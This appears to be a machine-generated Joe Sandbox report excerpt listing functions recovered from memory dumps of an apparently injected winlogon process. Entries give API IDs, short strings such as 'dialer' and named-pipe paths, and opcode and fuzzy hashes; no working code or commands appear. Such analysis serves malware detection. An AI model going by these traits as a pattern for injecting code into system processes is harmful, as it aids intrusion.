                                                                          Function 000001E858989DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction ID: ed1d6103eff1dcc676994d656ad2f911c5872803e8dc8710478f2b646a537078
                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction Fuzzy Hash: F831A4313226C2E2EE229B42E4407EDB694BF48BA0F5905379D5E47792EF39C4658B10
                                                                          Function 000001E858993DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 848c5f808f98b7fe64fe1be9f14dffa162bf3ffb4f70aadf000dfa4e6251c1b3
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: C6115B31320AC0C6E7619B56E84439DB6A1FB88FE4F444226EE5E877A4DF38C8148744
                                                                          Function 000001E858982F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: c1fd6422857e38418c878c4cd41444f40647f04957361f5aedf899a272e96910
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: 22315A32721B92C2EA15DF96E5407ADF7A1BF44B84F0841329E4D47B59EF38C4A1CB00
                                                                          Function 000001E85898CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: cd1afe50f7e6de5fdb75e3b85d99f54b8b5774328d87a634973043da6fa4d35a
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: 061159312212C6C2FA69A721D5953BDF2426F887F4F141736AC3F876EADE6884018A00
                                                                          Function 000001E85898199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 60db19895ce507a708008e45d9c0298ffec254aa5bc9d4092071c0d004566a38
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: 28011731320AC1C2EB64DB52E89879DB3A6FB88BC4F884036DE5E53755DE38C989C740
                                                                          Function 000001E8589836C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: 18b328c97b5f9e14fffcfa9212a447ac2abda381c2e5647efa8e85a057c85cab
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 19011775321BC0C6EB259B62E84879DB2A1BF49B86F04443ACD4E07B65EF3DC1488B00
                                                                          Function 000001E858988FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction ID: c300b2b6b54622bad3c43c23df103e30e38a6bb1438ec9a2dd89e032c6842fde
                                                                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction Fuzzy Hash: 53518932729683CAEB54CB15E848B9DB7A6FB44B88F508536DE4B47788DF39C841CB00
                                                                          Function 000001E858981A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: d0bcd0cf9b4692289a878d77c8ac4738952449dce6fe18ad4e1a7071ab5e44cd
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: D4F03C723246C1D2EB609B61F9C479DB761FB88BC8F844032DE4D46954DE2CC68DCB00
                                                                          Function 000001E85898BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: e6b40846573bec2309256a1e3779184d66e370f070609bbf47c065b346f7c57b
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: A2F06271221685D1FB108F29E84539DB321EF857A1F54062ADE6E452E4CF2CC045C700
                                                                          Function 000001E858983044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 177804a8e33fc8a1ffb9e6d06ac6c2892e3a9ed2a31dc03627c06d5a34e3f628
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: A4F0F874624BC5D2EA148F53F9551ADB662AF48FD0F489132EE4E47B18DE2CC4858700
                                                                          Function 000001E858985710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                          • Instruction ID: ff1100847cf1c0e0aadc7ec0e970ba072bd13cc79387902f55229e6ec2abdf55
                                                                          • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                          • Instruction Fuzzy Hash: 0361C436629A85CAE760DB55E45039EB7A0FB88784F504127EE8E87BA8DF7CC444CF00
                                                                          Function 000001E8589C3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: b4ee51cf0a1e5aea1822e43a26c047e5dcf7f4fbb0b99cff55914cd4d144b702
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 7511E932AB0ED1D2FAA42528E4523EDBF806F59374F49873BAD7E067D6CE26C8417101
                                                                          Function 000001E858963504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 13a26281ade054cd1280fdbce72e43605aafa02c3cf2d887f28f1c2fac503938
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: D511A332A30AD191FA64192AE4413EDB1906F59374FD8873BBD6E076E6CE38C8417100
                                                                          Function 000001E858994104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 63986d8d169832ca2b3c9ff94d929ac1109ad7e490c18855dc707efbf0d460dd
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 5D11A3B2B30AD092F67A5569D4653EDB1477F783B8F090636AD7E077D6EE24C8414201
                                                                          Function 000001E8589BF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: 45fbb07566537809df07c08353ba596d2c45bc6c88eb3f332a9267d3a220cd63
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: A661C6766286C0CEFA658BA9E5443EEFAA0EF85746F508837CE0E177A5DF34C8458300
                                                                          Function 000001E85895F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: bbb57aa9e3b830d463c4fe85b52b4203214c9bc4de7028ccc68d76f93c744b6c
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 2761A2766206C0C2FA659B65E5443EEFAA1EF867A6F544837CE0E17BA4DF34C8458300
                                                                          Function 000001E85898AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: bb76fc1650d308761c410147ea84cb38f2e16afbcf0730215f2385a251eb584a
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: 6C614633610A85CAEB209F65D4803DDB7A1FB48B88F044226EE4E17B99DF78C595CB02
                                                                          Function 000001E8589BA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: b8cb1cdd645de17ac90d150e5576baa1f770b257ea5295feeb99f43c7e10e3bf
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: A9517A322292C0CEEB648B65D45439CB7E0FB55B96F188227DE9D87B95CF39D490C702
                                                                          Function 000001E85895A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 0ad0f10a0311de8fe70e4511306a68505f179f6318197c4e8bd1820910d7e08b
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: DF517E322242C1CAEB648B25E44439DB7E0FF55B9AF184127DE9D87B95CF38D491CB0A
                                                                          Function 000001E85898AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 49808e8ca0374573422c17999fa92c520f6827b0ca759f7661e9c90c8d8cbcb6
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: C85138732206C2CBEB648B25D58439DB7E0EB54B99F184126DE9D87A96CF38D491CF02
                                                                          Function 000001E8589B8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: 5afbde93f76065e937d33a33ecda40d7cc0652e0afb463397a4e63f594b95558
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: B751B932629280CEEB55CF15E445BDCB799FB48BD9F508076DE0A63788EFB4D8418704
                                                                          Function 000001E858958405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: bfd78980145a28763c880af9517e8ac90edd43b032dea0cdb72a4fbda65ea15a
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 4A51AC32621680CAEB14CF15E445BDEB799FF54B9AF508176DE4E63788EF34D8428B04
                                                                          Function 000001E8589B83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: a63bd806f66d012ce775473c1f40d5f64a693a31238674c758956550f9c12806
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: F0318832225680DAEB159F11E849BDDBBA9FB48BD9F458036AE5E13788DF38C940C704
                                                                          Function 000001E8589583E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 56d3e007963a7e7881fb8535ced7d73073085fdb1eb8715deed5cad551f2bc8b
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: AD317C32221680D6EB14DF12E8457DEB7A4FF40B9AF958026EE5E17784DF38D941C704
                                                                          Function 000001E858992058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction ID: 5158255b9f45075a47059d5597f2be23213eaa00bc29a0f5feecf0f9424b8990
                                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction Fuzzy Hash: 6BD1AE32B24AC0C9E711CFA9D4402ECBBB6FB54B98F144226DE6E97B99DE34C516C740
                                                                          Function 000001E8589814A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: 87d0c39c7ef690860e2d692a8e2b1ea7438f5f62204bc229bf9756ed41ae7668
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: FA014832620AD0C6E715EFA6E90418EB7A2FB88FC1F044436EE4E43729EE38C051C740
                                                                          Function 000001E858992980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction ID: 12399152d6f5684d12032a5c33f3ea79e7a8066ea1a4d7d76d6e965cdc9918e8
                                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction Fuzzy Hash: DD91AD327206D0C5F7609FA9D8803EDFBA6BB45B98F14412BDE2E67A95DE34C486C700
                                                                          Function 000001E85898253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
